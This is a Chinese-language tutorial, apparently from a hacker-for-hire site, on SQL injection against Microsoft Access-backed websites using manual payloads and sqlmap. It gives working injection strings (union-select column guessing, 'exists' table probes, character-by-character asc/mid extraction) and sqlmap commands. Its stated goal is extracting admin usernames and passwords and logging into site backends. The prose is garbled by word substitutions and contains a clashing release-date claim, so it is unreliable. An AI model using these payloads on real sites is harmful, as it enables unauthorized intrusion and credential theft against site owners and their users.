运用SQLMap进行Access注入

访客5年前黑客工具763

1.1运用sqlmap进行access注入
关于存在access注入的站点,能够经过手艺注入或许东西注入来获取access数据库中的表以及内容,特别是获取网站后台办理表中的用户名及其暗码。
1.1.1 access数据库简介
Microsoft Office Access是由微软发布的联系数据库办理体系。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特色,是Microsoft Office 的体系程序之一。Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发东西结合在一起的一个数据库办理体系。它是微软OFFICE的一个成员,在包括专业版和更高版其他office版别里边被单独出售。2012年12月4日,最新的微软Office Access 2019在微软Office 2019里发布,微软Office Access 2013 是前一个版别,默然装置Office是不装置Access数据库。
MS ACCESS以它自己的格局将数据存储在依据Access Jet的数据库引擎里。它还能够直接导入或许链接数据(这些数据存储在其他应用程序和数据库)。软件开发人员和数据架构师能够运用Microsoft Access开发应用软件,“高档用户”能够运用它来构建软件应用程序。和其他工作应用程序相同,ACCESS支撑Visual Basic宏言语,它是一个面向目标的编程言语,能够引证各种目标,包括DAO(数据拜访目标),ActiveX数据目标,以及许多其他的ActiveX组件。可视目标用于显现表和报表,他们的办法和特点是在VBA编程环境下,VBA代码模块能够声明和调用Windows操作体系函数。
(1)ACCESS数据库结构
ACCESS数据库选用表名-列名-内容数据,它不像MySQL和MSSQL,需求先创立数据库,然后创立表,输入内容到表中。ACCESS的数据库是一个mdb文件(例如data.mdb),一个库能够包括若干张表。
(2)操作ACCESS数据库
默许是在装置Office时挑选装置Access组件来创立数据库,对数据库中的表施行办理操作。也能够经过一些Access数据库拜访东西进行操作。
1.1.2Access注入根底
1. access注入根本流程
(1)判别有无注入
(2)猜解表名
(3)猜解字段
(4)猜解办理员字段值
(5)猜解用户名和暗码长度
(6)猜解用户名和暗码
(7)破解加密暗码
(8)寻觅并登录后台
2.常见的注入东西
常见的SQL注入东西有“HDSI 3.0 Goldsun洁净拓展版”、“Domain”、“Safe3”、“啊D东西”、“井蛙之见”、Havij、pangolin、WebCruiser和SQLmap等。现在只是SQLmap是开源,出于安全考虑,主张用sqlmap东西进行access注入。
3.常见的查询 ***
(1)联合查询法(速度快,兼容性欠好)
and 1=1 and 1=2 ——判别注入
order by 22  ——猜有多少列(12正确,13过错,则为12个)
union select 1,2,3,4,5,6,7,8,9,10,11,12from admin ——猜表名(报错阐明表名不存在,将admin表换成其他持续猜想)
union select 1,2,username,4,5,6,7,8,9,10,11,12from admin ——猜列名(列名方位放置页面上显现的数字方位上,报错阐明列名不存在,换列明持续猜,列名猜对后及出账号暗码)
(2)逐字猜解法(速度慢,兼容性好)
and 1=1 and 1=2 ——判别注入
and exists (select * from admin) ——猜表名
and exists (select user_name from admin) ——猜列名
查数据:1.确认长度 2.确认asc数据(asc编码)
and (select top 1 len(user_name ) fromadmin)=5(user_name 的长度=5,正常则=5,也能够用>,
and (select top 1 asc(mid(user_name ,1,1))from admin)=97 判别之一位(97代表‘a’的ascll值)
and (select top 1 asc(mid(user_name ,2,1))from admin)=97 判别第二位
(user_name =admin 之一位a 第二位d 第三位m 第四位i 第五位npass_word=a48e190fafc257d3)
4. 判别有无注入
(1)大略型:提交单引号’,id值-1、id值+1,判别页面显现信息不同或许犯错信息。
(2)逻辑型(数字型注入):and1=1 、and 1=2;正常显现,内容与正常页面显现的成果根本相同;提示BOF或EOF(程序没做任何判别时),或提示找不到记载,或显现内容为空(程序加了on error resume next);在数据库中是否履行,and 1=1 永远为真所以页面回来正常,and 1=2永远为假所以回来的成果会犯错,依据其成果来判别是否存在sql注入。
(3)逻辑型(字符型注入):’and ’1′=’1/’ 、and ’1′=’2
(4)逻辑型(搜索型注入):%’and 1=1 、and ‘%’='%/%’ 、and 1=2 and ‘%’='%
1.1.3SQLmap思路及指令
1. SQLmapaccess注入操作思路
(1)手艺判别url是否存在SQL注入。经过在url传入参数处参加“’”、and 1=1、and 1=2等,检查页面是否犯错,假如存在页面不相同或许有犯错信息,则标明网站url存在sql注入。常见的过错信息如下:
Microsoft JET Database Engine 过错 ’80040e14′
在联合查询中所选定的两个数据表或查询中的列数不匹配。
/view.asp,行 26
以上信息标明数据库选用Access数据库。
(2)运用sqlmap进行检测注入点是否可用
Sqlmap指令:sqlmap.py –uurl 
假如存在,则会提示进行相应操作,例如判别数据库中的表,假如不存在则无法持续。
(3)检测表,履行“sqlmap.py–u url –tables”指令来获取access数据库表,需求挑选线程数,主张挑选1-20之间,这个数过大,会导致网站无法翻开。

[1] [2] [3]  黑客接单网

相关文章

网页挂马常见缝隙剖析与检测

一、CVE-2019-8373缝隙的开始剖析 2019年8月15日,趋势科技发表了他们发现的一同浏览器缝隙进犯事情。在检测到的进犯流量中,进犯者运用了cve-2019-8373这个缝隙来进犯IE浏览器...

一个MongoDB注入进犯事例剖析

在开端咱们的MongoDB“注入之旅”之前,咱们需求先知道和其他数据库比较,为什么咱们更乐意选MongoDB——由于MongoDB并不是SQL作为查询句子,所以人们可能会认为这样的数据库难以进行注入进...

怎么经过乱用SSLTLS绕过Web应用程序防火墙

介绍 近些年来,Web安全现已逐步变成了IT安全范畴里十分重要的一个部分。Web运用的优势就在于开发人员能够在较短的时间内集成各种要害服务,并且保护难度也比传统的桌面端运用程序要低许多。除了规划新的...

被黑的Drupal网站被用来挖矿,传达远控,发送欺诈邮件

黑客正在使用最近Drupal CMS中的已知缝隙,例如Drupalgeddon2和Drupalgeddon3来传达挖矿软件、长途管理工具(RAT)和以技术支撑为名的诈骗邮件。 两个缝隙编号为CVE-...

看我怎么编写一个验证码辨认程序

在此之前我收到了一些读者对我的反应,他们期望我能够在文中解说相关解析器的开发流程。为了满意我们的需求,我决议和你们共享一个我非常重要的项目的完好施行进程。话不多说,让我们现在就开端! 当我开发这些脚本...